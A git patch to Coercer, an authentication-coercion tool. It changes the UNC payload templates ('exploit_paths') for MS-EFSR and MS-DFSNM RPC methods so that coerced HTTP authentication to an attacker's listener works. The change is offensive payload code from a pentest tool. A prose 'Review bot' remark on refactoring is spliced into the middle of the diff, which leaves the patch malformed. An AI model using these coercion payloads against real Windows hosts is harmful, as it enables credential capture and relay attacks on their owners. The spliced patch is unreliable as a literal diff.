From 83a1fd7529ab07720b2d917e59847d8cd236c6aa Mon Sep 17 00:00:00 2001
From: "Remi GASCOU (Podalirius)" <79218792+p0dalirius@users.noreply.github.com>
Date: Wed, 4 Oct 2023 07:45:31 +0200
Subject: [PATCH] Fixed #42, Coercing HTTP Authentications did not work properly
---
 coercer/methods/MS_DFSNM/NetrDfsAddStdRoot.py | 2 +-
 coercer/methods/MS_DFSNM/NetrDfsRemoveStdRoot.py | 2 +-
 coercer/methods/MS_EFSR/EfsRpcAddUsersToFile.py | 2 +-
 coercer/methods/MS_EFSR/EfsRpcAddUsersToFileEx.py | 7 ++++---
 coercer/methods/MS_EFSR/EfsRpcDecryptFileSrv.py | 2 +-
 .../methods/MS_EFSR/EfsRpcDuplicateEncryptionInfoFile.py | 2 +-
 coercer/methods/MS_EFSR/EfsRpcEncryptFileSrv.py | 2 +-
 coercer/methods/MS_EFSR/EfsRpcFileKeyInfo.py | 2 +-
 coercer/methods/MS_EFSR/EfsRpcOpenFileRaw.py | 2 +-
 coercer/methods/MS_EFSR/EfsRpcQueryRecoveryAgents.py | 2 +-
 coercer/methods/MS_EFSR/EfsRpcQueryUsersOnFile.py | 2 +-
 coercer/methods/MS_EFSR/EfsRpcRemoveUsersFromFile.py | 2 +-
 12 files changed, 15 insertions(+), 14 deletions(-)
diff --git a/coercer/methods/MS_DFSNM/NetrDfsAddStdRoot.py b/coercer/methods/MS_DFSNM/NetrDfsAddStdRoot.py
index 032637a..0f6a1ea 100644
--- a/coercer/methods/MS_DFSNM/NetrDfsAddStdRoot.py
+++ b/coercer/methods/MS_DFSNM/NetrDfsAddStdRoot.py
@@ -43,7 +43,7 @@ class NetrDfsAddStdRoot(MSPROTOCOLRPCCALL):
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
- ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+ ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
 ]
 
 access = {
diff --git a/coercer/methods/MS_DFSNM/NetrDfsRemoveStdRoot.py b/coercer/methods/MS_DFSNM/NetrDfsRemoveStdRoot.py
index 8e05e86..44ffffd 100644
--- a/coercer/methods/MS_DFSNM/NetrDfsRemoveStdRoot.py
+++ b/coercer/methods/MS_DFSNM/NetrDfsRemoveStdRoot.py
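Review bot: The same four-entry `exploit_paths` literal is now hand-copied into all twelve files this patch touches, and the EfsRpcAddUsersToFileEx hunk shows the cost of that: its list had drifted to an older non-templated form (`\\Share\\` with no listen-port or `rnd()` placeholder) and needed its own correcting hunk. Hoisting the list into one shared module-level constant (e.g. `DEFAULT_EXPLOIT_PATHS` defined next to `MSPROTOCOLRPCCALL`) and assigning `exploit_paths = DEFAULT_EXPLOIT_PATHS` in each class would make the next template fix a one-line change instead of a twelve-file sweep. Separately, nothing in the code records why the `http` entry now carries a `\\share\\` component while the `smb` entries do not; a comment on that entry such as `# keep the share component: see issue #42 for why the http path differs from the smb ones` would stop a later cleanup from "simplifying" it back. The NetrDfsRemoveStdRoot, EfsRpcAddUsersToFile, EfsRpcDecryptFileSrv, EfsRpcDuplicateEncryptionInfoFile, EfsRpcEncryptFileSrv, EfsRpcFileKeyInfo, EfsRpcOpenFileRaw, EfsRpcQueryRecoveryAgents, EfsRpcQueryUsersOnFile and EfsRpcRemoveUsersFromFile hunks make the identical change and the same two remarks apply to each. The `exploit_paths` assignment this hunk edits starts above the hunk, so the list header is not visible here.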
@@ -42,7 +42,7 @@ class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL):
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
- ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+ ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
 ]
 
 access = {
diff --git a/coercer/methods/MS_EFSR/EfsRpcAddUsersToFile.py b/coercer/methods/MS_EFSR/EfsRpcAddUsersToFile.py
index d4952c3..4c82caf 100644
--- a/coercer/methods/MS_EFSR/EfsRpcAddUsersToFile.py
+++ b/coercer/methods/MS_EFSR/EfsRpcAddUsersToFile.py
@@ -59,7 +59,7 @@ class EfsRpcAddUsersToFile(MSPROTOCOLRPCCALL):
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
- ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+ ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
 ]
 
 access = {
diff --git a/coercer/methods/MS_EFSR/EfsRpcAddUsersToFileEx.py b/coercer/methods/MS_EFSR/EfsRpcAddUsersToFileEx.py
index 59a6f34..0ad9841 100644
--- a/coercer/methods/MS_EFSR/EfsRpcAddUsersToFileEx.py
+++ b/coercer/methods/MS_EFSR/EfsRpcAddUsersToFileEx.py
@@ -63,9 +63,10 @@ class EfsRpcAddUsersToFileEx(MSPROTOCOLRPCCALL):
 """
 
 exploit_paths = [
- ("smb", '\\\\{{listener}}\\Share\\file.txt\x00'),
- ("smb", '\\\\{{listener}}\\Share\\\x00'),
- ("smb", '\\\\{{listener}}\\Share\x00'),
+ ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
+ ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
+ ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
+ ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
 ]
 
 access = {
diff --git a/coercer/methods/MS_EFSR/EfsRpcDecryptFileSrv.py b/coercer/methods/MS_EFSR/EfsRpcDecryptFileSrv.py
index f87d10c..1be12de 100644
--- a/coercer/methods/MS_EFSR/EfsRpcDecryptFileSrv.py
+++ b/coercer/methods/MS_EFSR/EfsRpcDecryptFileSrv.py
@@ -41,7 +41,7 @@ class EfsRpcDecryptFileSrv(MSPROTOCOLRPCCALL):
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
- ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+ ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
 ]
 
 access = {
diff --git a/coercer/methods/MS_EFSR/EfsRpcDuplicateEncryptionInfoFile.py b/coercer/methods/MS_EFSR/EfsRpcDuplicateEncryptionInfoFile.py
index d0d38d1..32e75f3 100644
--- a/coercer/methods/MS_EFSR/EfsRpcDuplicateEncryptionInfoFile.py
+++ b/coercer/methods/MS_EFSR/EfsRpcDuplicateEncryptionInfoFile.py
@@ -52,7 +52,7 @@ class EfsRpcDuplicateEncryptionInfoFile(MSPROTOCOLRPCCALL):
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
- ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+ ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
 ]
 
 access = {
diff --git a/coercer/methods/MS_EFSR/EfsRpcEncryptFileSrv.py b/coercer/methods/MS_EFSR/EfsRpcEncryptFileSrv.py
index 503ec0f..41e149b 100644
--- a/coercer/methods/MS_EFSR/EfsRpcEncryptFileSrv.py
+++ b/coercer/methods/MS_EFSR/EfsRpcEncryptFileSrv.py
@@ -40,7 +40,7 @@ class EfsRpcEncryptFileSrv(MSPROTOCOLRPCCALL):
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
- ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+ ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
 ]
 
 access = {
diff --git a/coercer/methods/MS_EFSR/EfsRpcFileKeyInfo.py b/coercer/methods/MS_EFSR/EfsRpcFileKeyInfo.py
index 7aa411d..017dc94 100644
--- a/coercer/methods/MS_EFSR/EfsRpcFileKeyInfo.py
+++ b/coercer/methods/MS_EFSR/EfsRpcFileKeyInfo.py
@@ -41,7 +41,7 @@ class EfsRpcFileKeyInfo(MSPROTOCOLRPCCALL):
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
- ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+ ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
 ]
 
 access = {
diff --git a/coercer/methods/MS_EFSR/EfsRpcOpenFileRaw.py b/coercer/methods/MS_EFSR/EfsRpcOpenFileRaw.py
index dfd6e05..17cb710 100644
--- a/coercer/methods/MS_EFSR/EfsRpcOpenFileRaw.py
+++ b/coercer/methods/MS_EFSR/EfsRpcOpenFileRaw.py
@@ -41,7 +41,7 @@ class EfsRpcOpenFileRaw(MSPROTOCOLRPCCALL):
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
- ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+ ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
 ]
 
 access = {
diff --git a/coercer/methods/MS_EFSR/EfsRpcQueryRecoveryAgents.py b/coercer/methods/MS_EFSR/EfsRpcQueryRecoveryAgents.py
index 4eda784..7d92ae5 100644
--- a/coercer/methods/MS_EFSR/EfsRpcQueryRecoveryAgents.py
+++ b/coercer/methods/MS_EFSR/EfsRpcQueryRecoveryAgents.py
@@ -40,7 +40,7 @@ class EfsRpcQueryRecoveryAgents(MSPROTOCOLRPCCALL):
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
- ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+ ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
 ]
 
 access = {
diff --git a/coercer/methods/MS_EFSR/EfsRpcQueryUsersOnFile.py b/coercer/methods/MS_EFSR/EfsRpcQueryUsersOnFile.py
index 7cce310..e723135 100644
--- a/coercer/methods/MS_EFSR/EfsRpcQueryUsersOnFile.py
+++ b/coercer/methods/MS_EFSR/EfsRpcQueryUsersOnFile.py
@@ -40,7 +40,7 @@ class EfsRpcQueryUsersOnFile(MSPROTOCOLRPCCALL):
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
- ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+ ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
 ]
 
 access = {
diff --git a/coercer/methods/MS_EFSR/EfsRpcRemoveUsersFromFile.py b/coercer/methods/MS_EFSR/EfsRpcRemoveUsersFromFile.py
index e2d6167..66ac409 100644
--- a/coercer/methods/MS_EFSR/EfsRpcRemoveUsersFromFile.py
+++ b/coercer/methods/MS_EFSR/EfsRpcRemoveUsersFromFile.py
@@ -61,7 +61,7 @@ class EfsRpcRemoveUsersFromFile(MSPROTOCOLRPCCALL):
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
- ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+ ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
 ]
 
 access = {